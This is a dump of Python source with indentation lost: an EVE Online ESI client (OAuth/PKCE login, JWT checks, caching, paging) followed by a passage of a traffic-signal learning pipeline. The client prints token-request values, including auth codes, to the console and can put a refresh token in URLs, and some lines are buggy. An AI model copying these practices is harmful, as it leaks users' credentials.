saved_data=json.dumps(data)
...
callback_cache_server: (Optional)
class callback_cache_server:
def Get(key):
...
return cache[key]
def Set(key,data):
...
cache[key]=data
def Del(key):
...
def Clear():
...
def Sync():
...
def Close():
...
callback_gui_window_class:
class callback_gui_window_class:
def show(title,url):
...
def destroy()
...
"""
self.settings=self.configure(settings)
self.gui = gui
self.use_cache = use_cache
self.max_consistent_try = max_consistent_try
self.force_cache = False
self.repeat_max_try = 5
self.user_auth={}
self.refresh_token = ''
self.access_token = ''
self.expired = -1
self.auth_code = ''
self.random = ''
self.unique_state = ''
self.last_map_action=None
self.last_map_action_priority=['stop','skip']
self.window = None
self.WebServer = None
self.session = requests.Session()
self.debug = debug
self.p=print
self.i=input
if callable(callback_print):
self.p=callback_print
if callable(callback_input):
self.i=callback_input
if callable(callback_web_server):
self.web_server=callback_web_server(local_address=self.settings['local_address'], port=self.settings['port'])
else:
self.web_server=ESIAuthWebServer(local_address=self.settings['local_address'], port=self.settings['port'])
if callable(callback_cache_server):
self.cache=callback_cache_server()
else:
self.cache=ESICacheServer()
if callable(callback_saved_data):
self.storage=callback_saved_data
else:
self.storage=ESIUserDataStorage()
if callable(callback_gui_window_class):
self.window=callback_gui_window_class
else:
self.window=ESIGUIWindow()
if type(name) == str:
self.get(name)
def dbg(self,data,data2=None):
if self.debug:
if data2==None:
self.p(data)
else:
self.p(data,data2)
def validate_eve_jwt(self):
"""Validate a JWT token retrieved from the EVE SSO.
Args:
Returns
dict: The contents of the validated JWT token if there are no
validation errors
"""
res = self.session.get(self.settings['jwks_url'])
res.raise_for_status()
data = res.json()
try:
jwk_sets = data["keys"]
except KeyError as e:
self.p("Something went wrong when retrieving the JWK set. The returned "
"payload did not have the expected key {}. \nPayload returned "
"from the SSO looks like: {}".format(e, data))
return None
jwk_set = next((item for item in jwk_sets if item["alg"] == "RS256"))
try:
return jwt.decode(
self.access_token,
jwk_set,
algorithms=jwk_set["alg"],
issuer=self.settings['login_host']
)
except ExpiredSignatureError:
self.p("The JWT token has expired: {}")
return None
except JWTError as e:
self.p("The JWT signature was invalid: {}").format(str(e))
return None
except JWTClaimsError as e:
try:
return jwt.decode(
self.access_token,
jwk_set,
algorithms=jwk_set["alg"],
issuer=urllib.parse.urlunparse([self.settings['esi_proto'],self.settings['login_host'],'','','',''])
)
except JWTClaimsError as e:
self.p("The issuer claim was not from login.eveonline.com or "
"https://login.eveonline.com: {}".format(str(e)))
return None
def configure(self,settings):
default_settings={
'content_type':"application/x-www-form-urlencoded",
'login_host':"login.eveonline.com",
'base_auth_url':"https://login.eveonline.com/v2/oauth/authorize/",
'token_req_url':"https://login.eveonline.com/v2/oauth/token",
'jwks_url':'https://login.eveonline.com/oauth/jwks',
'gui_auth_window_name':'Login in EVE',
'user_agent':"eve-simple-esi library",
'esi_url':"esi.evetech.net/latest",
'esi_proto':"https",
'scopes':[],
'port':8635,
'local_address':'localhost'
}
default_settings.update(settings)
default_settings['scopes']=self.combine_client_scopes(default_settings['scopes'])
return default_settings
def combine_client_scopes(self,scopes):
return " ".join(scopes)
def auth_url(self,code_challenge=None):
"""Prints the URL to redirect users to.
Args:
code_challenge: A PKCE code challenge
"""
self.unique_state = base64.urlsafe_b64encode(secrets.token_bytes(8)).decode().replace("=", "")
params = {
"response_type": "code",
"redirect_uri": self.settings['client_callback_url'],
"client_id": self.settings['client_id'],
"scope": self.settings['scopes'],
"state": self.unique_state
}
if code_challenge:
params.update({
"code_challenge": code_challenge,
"code_challenge_method": "S256"
})
string_params = urllib.parse.urlencode(params)
full_auth_url = "{}?{}".format(self.settings['base_auth_url'], string_params)
self.full_auth_url = full_auth_url
return full_auth_url
def send_token_request(self,form_values, add_headers={}):
"""Sends a request for an authorization token to the EVE SSO.
Args:
form_values: A dict containing the form encoded values that should be
sent with the request
add_headers: A dict containing additional headers to send
Returns:
requests.Response: A requests Response object
"""
headers = {
"Content-Type": self.settings['content_type'],
"Host": self.settings['login_host']
}
if self.settings['user_agent']:
headers.update({"User-Agent": self.settings['user_agent']})
if add_headers:
headers.update(add_headers)
res = self.session.post(
self.settings['token_req_url'],
data=form_values,
headers=headers,
)
self.p("Request sent to URL {} with headers {} and form values: "
"{}\n".format(res.url, headers, form_values))
res.raise_for_status()
return res
def send_token_refresh(self):
headers = {
"Content-Type": self.settings['content_type'],
"Host": self.settings['login_host'],
}
if self.settings['user_agent']:
headers.update({"User-Agent": self.settings['user_agent']})
form_values = {
"grant_type": "refresh_token",
"refresh_token": self.refresh_token,
"client_id": self.settings['client_id'],
"scope": self.settings['scopes'] # OPTIONAL
}
self.dbg(form_values)
res = self.session.post(
self.settings['token_req_url'],
data=form_values,
headers=headers,
)
self.dbg("Request sent to URL {} with headers {} and form values: "
"{}\n".format(res.url, headers, form_values))
res.raise_for_status()
return res
def uri_hash(self,uri): # Hash based on user and uri
character_name='Unregistered'
if 'character_name' in self.user_auth:
character_name=self.user_auth['character_name']
url=list(urllib.parse.urlsplit(uri))
query=urllib.parse.parse_qs(url[3])
if 'token' in query:
del query['token']
url[3]=urllib.parse.urlencode(query)
url=urllib.parse.urlunsplit(url)
text=character_name + url# + str(hash(str(body)))
text = hashlib.md5(text.encode('utf-8')).hexdigest()
return str(text)
def http_return_obj(self,cached,status_code,data,headers,validated_headers):
res={
'cached':cached,
'data':data,
'headers':dict(headers),
'status_code':status_code,
'consistent':False,
'error':False,
'validated_headers':validated_headers
}
if ((status_code==304) and (validated_headers)) :
res['consistent']=True
elif not status_code==200:
res['error']=True
return res
def validate_headers(self,headers,validate_array):
if validate_array == None:
return True
response=True
for field in validate_array:
if validate_array[field] is None:
continue
if not field in headers:
continue
if not validate_array[field] == headers[field]:
self.dbg('validate error',[field,validate_array[field],headers[field]])
response=False
break
return response
def set_cache_data(self,uri_hash,content,headers):
if self.use_cache:
json_content=self.json(content)
if json_content:
self.cache.Set(uri_hash,{'header':headers,'data':json_content})
return True
return False
def get_etag(self,etag,uri_cache):
if etag is None:
if 'Etag' in uri_cache['header']:
etag=uri_cache['header']['Etag']
return etag
def send_cached_data(self, uri, body=None, etag=None, method='GET', validate_array=None):
cached=False
uri_cache=False
uri_hash=self.uri_hash(uri)
if (not ((body is None) and (method=='GET'))): # For POST/DELETE/PUT requests and if no cache
data=self.send_esi_request_http(uri, etag=etag, body=body, method=method)
content=data.content
headers=data.headers
status_code=data.status_code
return self.http_return_obj(False,status_code,content,headers,True)
if self.use_cache: #Initialize Cache
uri_cache=self.cache.Get(uri_hash)
validated_headers=False
if not uri_cache is None:
self.dbg('validating cache data for',uri)
validated_headers=self.validate_headers(uri_cache['header'],validate_array)
if not validated_headers:
uri_cache=False
if not uri_cache: # Request without cache data
data=self.send_esi_request_http(uri, etag=etag, body=body, method=method)
content=data.content
headers=data.headers
status_code=data.status_code
self.dbg('validating request data for',uri)
validated_headers=self.validate_headers(headers,validate_array)
if ((status_code in [200]) and (validated_headers) and (self.set_cache_data(uri_hash,content,headers)) ):
self.dbg('Add to cache',uri)
elif self.force_cache: # Return data from cache without check
status_code=304
cached=True
content=json.dumps(uri_cache['data'])
headers=uri_cache['header']
else: # Request with cache data
etag=self.get_etag(etag,uri_cache)
data=self.send_esi_request_http(uri, etag=etag, body=body, method=method)
headers=data.headers
content=data.content
status_code=data.status_code
self.dbg('validating etag data for',uri)
validated_headers=self.validate_headers(headers,validate_array)
if status_code == 304:
cached=True
content=json.dumps(uri_cache['data'])
if ((status_code in [200]) and (validated_headers) and (self.set_cache_data(uri_hash,content,headers)) ):
self.dbg('Add to cache',uri)
return self.http_return_obj(cached,status_code,content,headers,validated_headers)
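# Summary of send_cached_data above: non-GET requests (or GETs with a body)
# bypass the cache entirely; with force_cache set, a previously cached entry is
# returned as a synthetic 304; otherwise a conditional request is sent with the
# stored ETag (If-None-Match), a real 304 is answered from the cached copy, and
# a 200 with validated headers refreshes the cache.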
def send_cached_json(self, uri, body=None, etag=None, method='GET', validate_array=None):
data=self.send_cached_data(uri, body=body, etag=None, method=method, validate_array=validate_array)
d=self.json(data['data'])
if d is None:
return None
return d
def json(self,data):
if data == b'':
return {}
else:
try:
res=json.loads(data)
except:
return ('json_error',data.decode('utf-8'))
return res
def send_esi_request_http(self, uri, etag, body=None, method='GET'):
headers = {
"Authorization": "Bearer {}".format(self.access_token),
}
if etag:
headers.update({"If-None-Match": etag})
if self.settings['user_agent']:
headers.update({"User-Agent": self.settings['user_agent']})
if ((body) and (method=='GET')):
method='POST'
try:
if method=='GET':
res = self.session.get(uri, headers=headers)
elif method=='POST':
headers.update({"Content-Type": "application/json"})
res = self.session.post(uri, data=body, headers=headers)
elif method=='PUT':
headers.update({"Content-Type": "application/json"})
res = self.session.put(uri, data=body, headers=headers)
elif method=='DELETE':
res = self.session.delete(uri, headers=headers)
if res.status_code==401:
self.re_auth()
res=self.send_esi_request_http(uri, etag, body, method)
#if body is None:
# res = self.session.get(uri, headers=headers)
return res
except:
self.p(sys.exc_info())
raise
def print_sso_failure(self, sso_response):
self.p("\nSomething went wrong! Here's some debug info to help you out:")
self.p("\nSent request with url: {} \nbody: {} \nheaders: {}".format(
sso_response.request.url,
sso_response.request.body,
sso_response.request.headers
))
self.p("\nSSO response code is: {}".format(sso_response.status_code))
self.p("\nSSO response JSON is: {}".format(sso_response.json()))
def auth(self):
self.p("Follow the prompts and enter the info asked for.")
url=self.auth_url(code_challenge=self.create_code_challenge())
self.auth_code = self.i(url+"\nCopy the \"code\" query parameter and enter it here: ")
return self.auth_part2()
def create_code_challenge(self):
self.random = base64.urlsafe_b64encode(secrets.token_bytes(32))
m = hashlib.sha256()
m.update(self.random)
d = m.digest()
code_challenge = base64.urlsafe_b64encode(d).decode().replace("=", "")
return code_challenge
def gui_auth(self):
self.dbg("gui_auth")
self.auth_url(code_challenge=self.create_code_challenge())
self.web_server.reg_callback(state=self.unique_state, on_success=self.success_auth_code, on_error=self.error_auth_code)
return self.open_url()
def auth_part2(self):
code_verifier = self.random
form_values = {
"grant_type": "authorization_code",
"client_id": self.settings['client_id'],
"code": self.auth_code,
"code_verifier": code_verifier
}
sso_auth_response = self.send_token_request(form_values)
if sso_auth_response.status_code == 200:
data = sso_auth_response.json()
self.access_token = data["access_token"]
self.refresh_token = data["refresh_token"]
self.expired = int(data["expires_in"]) + int(time.time())
self.validate_auth()
return self.auth_object()
else:
self.print_sso_failure(sso_auth_response)
def validate_auth(self):
validated_jwt = self.validate_eve_jwt()
self.dbg("\nThe contents of the access token are: {}".format(validated_jwt))
self.character_id = validated_jwt["sub"].split(":")[2]
self.character_name = validated_jwt["name"]
self.expired = validated_jwt["exp"]
self.settings['client_id'] = validated_jwt["azp"]
self.scope = self.combine_client_scopes(validated_jwt["scp"])
def auth_object(self):
self.user_auth={
"access_token": self.access_token,
"refresh_token":self.refresh_token,
"expired":self.expired,
"character_id":self.character_id,
"character_name":self.character_name,
"client_id":self.settings['client_id'],
"scope":self.scope
}
self.storage.write(self.character_name,self.user_auth)
return self.user_auth
def get(self,char_name):
self.user_auth=self.storage.read(char_name)
if self.user_auth is not None:
self.dbg('Character data read')
self.access_token=self.user_auth['access_token']
self.refresh_token=self.user_auth['refresh_token']
self.expired=self.user_auth['expired']
self.character_id=self.user_auth['character_id']
self.character_name=self.user_auth['character_name']
self.settings['client_id']=self.user_auth['client_id']
self.scope=self.user_auth['scope']
return self.re_auth()
self.user_auth={}
if self.gui:
return self.gui_auth()
else:
return self.auth()
return None
def stop_web_server(self):
if self.WebServer:
self.WebServer.shutdown()
def open_url(self):
self.window.show(self.settings['gui_auth_window_name'], self.full_auth_url)
self.stop_web_server()
if self.auth_code == '':
return False
return True
def success_auth_code(self,query):
self.set_auth_code(query)
self.window.destroy()
def error_auth_code(self,query):
self.window.destroy()
self.dbg('error_auth_code',query)
def set_auth_code(self,query):
if query['state'][0] == self.unique_state:
self.dbg('Authorization server valid')
self.auth_code=query['code']
self.dbg(self.auth_part2())
def re_auth(self):
if self.refresh_token == '':
return None
if self.expired > time.time():
return self.auth_object()
sso_auth_response = self.send_token_refresh()
if sso_auth_response.status_code == 200:
data = sso_auth_response.json()
self.access_token = data["access_token"]
self.refresh_token = data["refresh_token"]
self.expired = int(data["expires_in"]) + int(time.time())
self.validate_auth()
return self.auth_object()
else:
self.print_sso_failure(sso_auth_response)
def prepare_obj_to_url(self,obj):
for param in obj:
if type(obj[param]) == list:
obj[param]=self.combine_client_scopes(obj[param])
return obj
def clear_cache(self):
self.cache.Clear()
def param_creator(self,command,params,token=False):
pattern = re.compile(r'({[^\}]+})')
splitted=pattern.split(command)
for i in range(len(splitted)):
sub = splitted[i]
if not pattern.match(sub):
continue
var=sub[1:-1:] # Remove {}
if var in params:
splitted[i]=str(params[var])
elif var in self.user_auth:
splitted[i]=str(self.user_auth[var])
else:
self.dbg('Error, no variable {} in params'.format(var))
return None
path="".join(splitted)
if token:
params.update({'token':self.refresh_token})
params=self.prepare_obj_to_url(params)
uri=urllib.parse.urlunparse([self.settings['esi_proto'],self.settings['esi_url'],path,'',urllib.parse.urlencode(params),''])
return uri
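# Illustrative expansion by param_creator (endpoint and values are examples):
# a command like '/characters/{character_id}/assets/' with params {'page': 2}
# fills {character_id} from params or the stored user_auth data and yields
# roughly https://esi.evetech.net/latest/characters/<id>/assets/?page=2 using
# the esi_proto / esi_url settings; token=True also appends the refresh token
# as a 'token' query parameter.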
def op_single(self,command,params={},post=False,etag=None,method="GET",body=None,raw=False, validate_array=None):
result=None
repeat=True
i=0
while ((i < self.repeat_max_try) and (repeat==True)):
i=i+1
if post:
method="POST"
if not method=="GET":
repeat=False
uri=self.param_creator(command,params)
if uri is None:
return None
if raw:
result=self.send_cached_data(uri, body=body, etag=etag, method=method, validate_array=validate_array)
if not result['error']:
return self.send_cached_data(uri, body=body, etag=etag, method=method, validate_array=validate_array)
else:
result=self.send_cached_json(uri, body=body, etag=etag, method=method, validate_array=validate_array)
if not type(result) is tuple:
return result
return result
def paged_data(self,data,obj):
if type(data) is list:
return obj+data
return obj.append(data)
def check_consistent(self,pages_count,command,params,method,body,validate_array=None):
consistent=True
for i in range(pages_count):
page_params=params.copy()
page_params['page']=i+1
page=self.op_single(command,params=page_params,method=method,etag=None,body=body,raw=True,validate_array=validate_array)
last_header=dict(page['headers'])
last_status=page['status_code']
last_validated_headers=page['validated_headers']
if not last_validated_headers:
self.dbg(i,['data changed while being fetched'])
consistent=False
if (not ( page['status_code'] == 304 )):
self.dbg(i,['status_code',page['status_code']])
consistent=False
if not int(page['headers']['X-Pages']) == pages_count:
self.dbg(i,['pages_count changed',pages_count,int(page['headers']['X-Pages'])])
pages_count=int(page['headers']['X-Pages'])
consistent=False
if not consistent:
break
return {
'consistent':consistent,
'pages_count':pages_count,
'last_header':last_header,
'last_status':last_status,
'validated_headers':last_validated_headers
}
def get_all_pages(self,first,pages_count,command,params,method,body):
result=[]
result_hash=[]
last_header=dict(first['headers'])
last_status=first['status_code']
last_validated_headers=False
consistent=True
validate_array=None
for i in range(pages_count):
page_params=params.copy()
page_params['page']=i+1
uri=self.param_creator(command,page_params,token=False)
if uri is None:
return None
result_hash.append(self.uri_hash(uri))
page=self.op_single(command,params=page_params,method=method,body=body, raw=True, validate_array=validate_array)
if i==0: #Make validate_array for first page
validate_array=self.make_validate_array(page['headers'])
last_header=dict(page['headers'])
last_status=page['status_code']
last_validated_headers=page['validated_headers']
consistent=page['consistent']
data=self.json(page['data'])
if data is None:
consistent=False
break
if not last_validated_headers:
self.dbg(i,['data changed while being fetched'])
consistent=False
break
if last_status in [200,304] :
if ( (last_status == 200) and (self.use_cache) ):
self.dbg(i,last_status)
consistent=False
else:
self.dbg(i,last_status)
consistent=False
break
if page['error']:
data=self.json(page['data'])
consistent=False
result=self.paged_data(data,result)
return {
'consistent':consistent,
'pages_count':pages_count,
'result':result,
'result_hash':result_hash,
'last_header':last_header,
'last_status':last_status,
'validated_headers':last_validated_headers,
'validate_array':validate_array
}
def make_validate_array(self,headers):
validate_array={
'X-Pages':None,
'Last-Modified':None,
}
for field in validate_array:
if field in headers:
validate_array[field]=headers[field]
return validate_array
def data_returner(self,data,raw):
json_data=self.json(data['data'])
if json_data is not None:
data['data']=json_data
if raw:
return data
return data['data']
def list_filters_fields(self,data,query_array):
for query in query_array:
if self.list_filters_field(data,query[0],query[1],query[2]):
last_map_action=query[3]
if self.last_map_action == None:
self.last_map_action=last_map_action
elif self.last_map_action_priority.index(self.last_map_action) > self.last_map_action_priority.index(last_map_action):
self.last_map_action=last_map_action
def list_filters_field(self,data,field_name,operator,compared_data):
if field_name in data:
if operator == '==':
return data[field_name] == compared_data
elif operator == '!=':
return (not (data[field_name] == compared_data))
elif operator == '>':
return data[field_name] > compared_data
elif operator == '<':
return data[field_name] < compared_data
elif operator == '>=':
return data[field_name] >= compared_data
elif operator == '<=':
return data[field_name] <= compared_data
elif operator == 'in':
return data[field_name] in compared_data
elif operator == 'not in':
return (not (data[field_name] in compared_data))
elif operator == 'startswith':
return data[field_name].startswith(compared_data)
elif operator == 'endswith':
return data[field_name].endswith(compared_data)
elif operator == 're':
return (not (compared_data.match(data[field_name]) == None))
return False
def map_obj (self,data,obj):
return_data={}
if self.last_map_action in ['skip','stop']:
return return_data
if 'fields' in obj:
if type(obj['fields']) is list:
for field in obj['fields']:
if field in data:
return_data[field]=data[field]
else:
return data[obj['fields']]
if self.last_map_action == 'stop':
return return_data
if 'id' in obj:
if (('params' in obj) and (obj['id'] in obj['params'])):
return_data.update({obj['id']:obj['params'][obj['id']]})
elif obj['id'] in self.user_auth:
return_data.update({obj['id']:self.user_auth[obj['id']]})
if 'map' in obj:
for field in obj['map']:
if not (field in data):
continue
n_param={}
n_param[field]=data[field]
new_obj=obj['map'][field].copy()
if 'link' in obj['map'][field]:
n_param[obj['map'][field]['link']]=n_param[field]
new_obj['id']=new_obj['link']
del n_param[field]
del new_obj['link']
else:
new_obj['id']=field
if 'params' in obj['map'][field]:
n_param.update(obj['map'][field]['params'])
del new_obj['params']
new_obj['params']=n_param
if self.last_map_action == 'stop':
return return_data
if 'name' in obj['map'][field]:
return_data[obj['map'][field]['name']]=self.map(new_obj,first=False)
else:
return_data[field]=self.map(new_obj,first=False)
return return_data
def map_list (self,data,obj):
return_data=[]
for field in data:
if 'list_filters' in obj:
self.list_filters_fields(field,obj['list_filters'])
if self.last_map_action == 'stop':
return return_data
if self.last_map_action == 'skip':
self.last_map_action=None
continue
return_data.append(self.map_check(field,obj))
return return_data
def map_check (self,data,obj):
if self.last_map_action == 'stop':
return None
if type(data) is dict:
return_data=self.map_obj(data,obj)
elif type(data) is list:
return_data=self.map_list(data,obj)
elif 'link' in obj:
new_obj=obj.copy()
if not 'params' in obj:
new_obj['params']={}
new_obj['params'][obj['link']]=data
return_data=self.map(new_obj,first=False)
else:
return_data=data
return return_data
def make_flags(self,flags):
self_flags=dir(self)
prev_state={}
for flag in flags:
if flag in self_flags:
prev_state[flag]=getattr(self,flag)
setattr(self,flag,True)
return prev_state
def return_state(self,flags):
self_flags=dir(self)
for flag in flags:
if flag in self_flags:
setattr(self,flag,flags[flag])
def map (self,obj,first=True):
params={}
if 'params' in obj:
params=obj['params']
command=None
method="GET"
if 'get' in obj:
command=obj['get']
method="GET"
prev_state={}
if 'flags' in obj:
prev_state=self.make_flags(obj['flags'])
data=self.op(command,params=params,method=method)
error_try=0
while (type(data) is list) and (len(data) > 0) and (data[0]=="json_error") and (error_try<self.repeat_max_try):
invert_cache=self.force_cache
if invert_cache:
self.force_cache=False
data=self.op(command,params=params,method=method)
if invert_cache:
self.force_cache=True
error_try=error_try+1
if 'flags' in obj:
self.return_state(prev_state)
return_data=self.map_check(data,obj)
if first:
self.last_map_action=None
return return_data
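# Illustrative 'map' descriptor (endpoints and field names are examples only,
# with api an authenticated ESI instance): fetch one endpoint via 'get', keep
# selected 'fields', and resolve a nested id through a 'map' entry whose 'link'
# names the placeholder of the follow-up request.
#
#   character_with_corp = {
#       'get': '/characters/{character_id}/',
#       'fields': ['name', 'corporation_id'],
#       'map': {
#           'corporation_id': {
#               'get': '/corporations/{corporation_id}/',
#               'link': 'corporation_id',
#               'fields': ['name', 'ticker'],
#           },
#       },
#   }
#   result = api.map(character_with_corp)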
def op(self,command,params={},post=False,etag=None,method="GET",body=None,raw=False,single=False):
if ((post) and (method=="GET")):
method="POST"
if ((method == "GET") and (single)): # Return not paged GET request
return self.op_single(command,params=params,post=post,etag=etag,method=method,body=body,raw=raw)
first=self.op_single(command,params=params,method=method,body=body, raw=True)
if first is None:
return None
data=self.json(first['data'])
if data is None:
self.dbg('data is not valid json')
return self.data_returner(first,raw)
if 'X-Pages' not in first['headers']: # Single page response
return self.data_returner(first,raw)
if not self.use_cache:
self.dbg('cannot get consistent and verified paged data without cache')
return self.data_returner(first,raw)
pages_count=int(first['headers']['X-Pages'])
consistent_try=0
consistent=False
result={'consistent':False,'pages_count':pages_count, 'result':[], 'result_hash':[], 'last_header':dict(first['headers']),'last_status':first['status_code']}
while ( (not consistent) and (consistent_try < self.max_consistent_try)):
consistent=False
consistent_try=consistent_try+1
self.dbg('get_all_pages')
result=self.get_all_pages(first,pages_count,command,params,method,body) # Getting data
self.cache.Sync()
if result['consistent']:
consistent=True
break
elif not result['validated_headers']: # Restart request pages if data changed
continue
self.dbg('check_consistent')
check=self.check_consistent(pages_count,command,params,method,body,result['validate_array'])
self.cache.Sync()
if not check['consistent']:
consistent=False
pages_count=check['pages_count']
continue
consistent=True
result['consistent']=check['consistent']
result['pages_count']=check['pages_count']
result['last_header']=check['last_header']
result['last_status']=check['last_status']
if consistent:
if raw:
return self.http_return_obj(self.use_cache,result['last_status'],result['result'],result['last_header'],True)
return result['result']
self.dbg('Cannot get consistent data')
return self.http_return_obj(first['cached'],first['status_code'],first['data'],first['headers'],False)
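# A minimal end-to-end sketch, kept as an uncalled helper so importing the
# module is unaffected. The client id, callback URL, scope and character name
# are placeholders; a registered EVE SSO application and network access would
# be needed for this to actually run.
def _example_esi_session():
    esi = ESI({
        'client_id': 'YOUR_SSO_CLIENT_ID',
        'client_callback_url': 'http://localhost:8635/callback',
        'scopes': ['publicData'],
    }, name='Some Character', gui=False)
    # Public character sheet; op() handles paging, ETags and caching itself.
    character = esi.op('/characters/{character_id}/', single=True)
    print(character)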
|
pipeline.py
|
import json
import os
import shutil
import xml.etree.ElementTree as ET
from generator import Generator
from construct_sample import ConstructSample
from updater import Updater
from multiprocessing import Process, Pool
from model_pool import ModelPool
import random
import pickle
import model_test
import pandas as pd
import numpy as np
from math import isnan
import sys
import time
import traceback
class Pipeline:
_LIST_SUMO_FILES = [
"cross.tll.xml",
"cross.car.type.xml",
"cross.con.xml",
"cross.edg.xml",
"cross.net.xml",
"cross.netccfg",
"cross.nod.xml",
"cross.sumocfg",
"cross.typ.xml"
]
@staticmethod
def _set_traffic_file(sumo_config_file_tmp_name, sumo_config_file_output_name, list_traffic_file_name):
# update sumocfg
sumo_cfg = ET.parse(sumo_config_file_tmp_name)
config_node = sumo_cfg.getroot()
input_node = config_node.find("input")
for route_files in input_node.findall("route-files"):
input_node.remove(route_files)
input_node.append(
ET.Element("route-files", attrib={"value": ",".join(list_traffic_file_name)}))
sumo_cfg.write(sumo_config_file_output_name)
def _path_check(self):
# check path
if os.path.exists(self.dic_path["PATH_TO_WORK_DIRECTORY"]):
if self.dic_path["PATH_TO_WORK_DIRECTORY"] != "records/default":
raise FileExistsError
else:
pass
else:
os.makedirs(self.dic_path["PATH_TO_WORK_DIRECTORY"])
if os.path.exists(self.dic_path["PATH_TO_MODEL"]):
if self.dic_path["PATH_TO_MODEL"] != "model/default":
raise FileExistsError
else:
pass
else:
os.makedirs(self.dic_path["PATH_TO_MODEL"])
if os.path.exists(self.dic_path["PATH_TO_PRETRAIN_WORK_DIRECTORY"]):
pass
else:
os.makedirs(self.dic_path["PATH_TO_PRETRAIN_WORK_DIRECTORY"])
if os.path.exists(self.dic_path["PATH_TO_PRETRAIN_MODEL"]):
pass
else:
os.makedirs(self.dic_path["PATH_TO_PRETRAIN_MODEL"])
def _copy_conf_file(self, path=None):
# write conf files
if path == None:
path = self.dic_path["PATH_TO_WORK_DIRECTORY"]
json.dump(self.dic_exp_conf, open(os.path.join(path, "exp.conf"), "w"),
indent=4)
json.dump(self.dic_agent_conf, open(os.path.join(path, "agent.conf"), "w"),
indent=4)
json.dump(self.dic_traffic_env_conf,
open(os.path.join(path, "traffic_env.conf"), "w"), indent=4)
def _copy_sumo_file(self, path=None):
if path == None:
path = self.dic_path["PATH_TO_WORK_DIRECTORY"]
# copy sumo files
for file_name in self._LIST_SUMO_FILES:
shutil.copy(os.path.join(self.dic_path["PATH_TO_DATA"], file_name),
os.path.join(path, file_name))
for file_name in self.dic_exp_conf["TRAFFIC_FILE"]:
shutil.copy(os.path.join(self.dic_path["PATH_TO_DATA"], file_name),
os.path.join(path, file_name))
def _copy_anon_file(self, path=None):
# hard code !!!
if path == None:
path = self.dic_path["PATH_TO_WORK_DIRECTORY"]
# copy sumo files
shutil.copy(os.path.join(self.dic_path["PATH_TO_DATA"], self.dic_exp_conf["TRAFFIC_FILE"][0]),
os.path.join(path, self.dic_exp_conf["TRAFFIC_FILE"][0]))
shutil.copy(os.path.join(self.dic_path["PATH_TO_DATA"], self.dic_exp_conf["ROADNET_FILE"]),
os.path.join(path, self.dic_exp_conf["ROADNET_FILE"]))
def _modify_sumo_file(self, path=None):
if path == None:
path = self.dic_path["PATH_TO_WORK_DIRECTORY"]
# modify sumo files
self._set_traffic_file(os.path.join(self.dic_path["PATH_TO_WORK_DIRECTORY"], "cross.sumocfg"),
os.path.join(path, "cross.sumocfg"),
self.dic_exp_conf["TRAFFIC_FILE"])
def __init__(self, dic_exp_conf, dic_agent_conf, dic_traffic_env_conf, dic_path):
# load configurations
self.dic_exp_conf = dic_exp_conf
self.dic_agent_conf = dic_agent_conf
self.dic_traffic_env_conf = dic_traffic_env_conf
self.dic_path = dic_path
# do file operations
self._path_check()
self._copy_conf_file()
if self.dic_traffic_env_conf["SIMULATOR_TYPE"] == 'sumo':
self._copy_sumo_file()
self._modify_sumo_file()
elif self.dic_traffic_env_conf["SIMULATOR_TYPE"] == 'anon':
self._copy_anon_file()
# test_duration
self.test_duration = []
sample_num = 10 if self.dic_traffic_env_conf["NUM_INTERSECTIONS"]>=10 else min(self.dic_traffic_env_conf["NUM_INTERSECTIONS"], 9)
print("sample_num for early stopping:", sample_num)
self.sample_inter_id = random.sample(range(self.dic_traffic_env_conf["NUM_INTERSECTIONS"]), sample_num)
def early_stopping(self, dic_path, cnt_round): # Todo multi-process
print("decide whether to stop")
early_stopping_start_time = time.time()
record_dir = os.path.join(dic_path["PATH_TO_WORK_DIRECTORY"], "test_round", "round_"+str(cnt_round))
ave_duration_all = []
# compute duration
for inter_id in self.sample_inter_id:
try:
df_vehicle_inter_0 = pd.read_csv(os.path.join(record_dir, "vehicle_inter_{0}.csv".format(inter_id)),
sep=',', header=0, dtype={0: str, 1: float, 2: float},
names=["vehicle_id", "enter_time", "leave_time"])
duration = df_vehicle_inter_0["leave_time"].values - df_vehicle_inter_0["enter_time"].values
ave_duration = np.mean([time for time in duration if not isnan(time)])
ave_duration_all.append(ave_duration)
except FileNotFoundError:
error_dir = os.path.join(dic_path["PATH_TO_WORK_DIRECTORY"]).replace("records", "errors")
if not os.path.exists(error_dir):
os.makedirs(error_dir)
f = open(os.path.join(error_dir, "error_info.txt"), "a")
f.write("Fail to read csv of inter {0} in early stopping of round {1}\n".format(inter_id, cnt_round))
f.close()
pass
ave_duration = np.mean(ave_duration_all)
self.test_duration.append(ave_duration)
early_stopping_end_time = time.time()
print("early_stopping time: {0}".format(early_stopping_end_time - early_stopping_start_time) )
if len(self.test_duration) < 30:
return 0
else:
duration_under_exam = np.array(self.test_duration[-15:])
mean_duration = np.mean(duration_under_exam)
std_duration = np.std(duration_under_exam)
max_duration = np.max(duration_under_exam)
if std_duration/mean_duration < 0.1 and max_duration < 1.5 * mean_duration:
return 1
else:
return 0
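# Stopping rule implemented above: once at least 30 test rounds have been
# evaluated, look at the mean trip duration of the last 15 rounds and stop when
# the relative standard deviation is below 0.1 and the maximum stays under
# 1.5x the mean.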
def generator_wrapper(self, cnt_round, cnt_gen, dic_path, dic_exp_conf, dic_agent_conf, dic_traffic_env_conf,
best_round=None):
generator = Generator(cnt_round=cnt_round,
cnt_gen=cnt_gen,
dic_path=dic_path,
dic_exp_conf=dic_exp_conf,
dic_agent_conf=dic_agent_conf,
dic_traffic_env_conf=dic_traffic_env_conf,
best_round=best_round
)
print("make generator")
generator.generate()
print("generator_wrapper end")
return
def updater_wrapper(self, cnt_round, dic_agent_conf, dic_exp_conf, dic_traffic_env_conf, dic_path, best_round=None, bar_round=None):
updater = Updater(
cnt_round=cnt_round,
dic_agent_conf=dic_agent_conf,
dic_exp_conf=dic_exp_conf,
dic_traffic_env_conf=dic_traffic_env_conf,
dic_path=dic_path,
best_round=best_round,
bar_round=bar_round
)
updater.load_sample_for_agents()
updater.update_network_for_agents()
print("updater_wrapper end")
return
def model_pool_wrapper(self, dic_path, dic_exp_conf, cnt_round):
model_pool = ModelPool(dic_path, dic_exp_conf)
model_pool.model_compare(cnt_round)
model_pool.dump_model_pool()
return
#self.best_round = model_pool.get()
#print("self.best_round", self.best_round)
def downsample(self, path_to_log, i):
path_to_pkl = os.path.join(path_to_log, "inter_{0}.pkl".format(i))
with open(path_to_pkl, "rb") as f_logging_data:
try:
logging_data = pickle.load(f_logging_data)
subset_data = logging_data[::10]
print(subset_data)
os.remove(path_to_pkl)
with open(path_to_pkl, "wb") as f_subset:
try:
pickle.dump(subset_data, f_subset)
except Exception as e:
print("----------------------------")
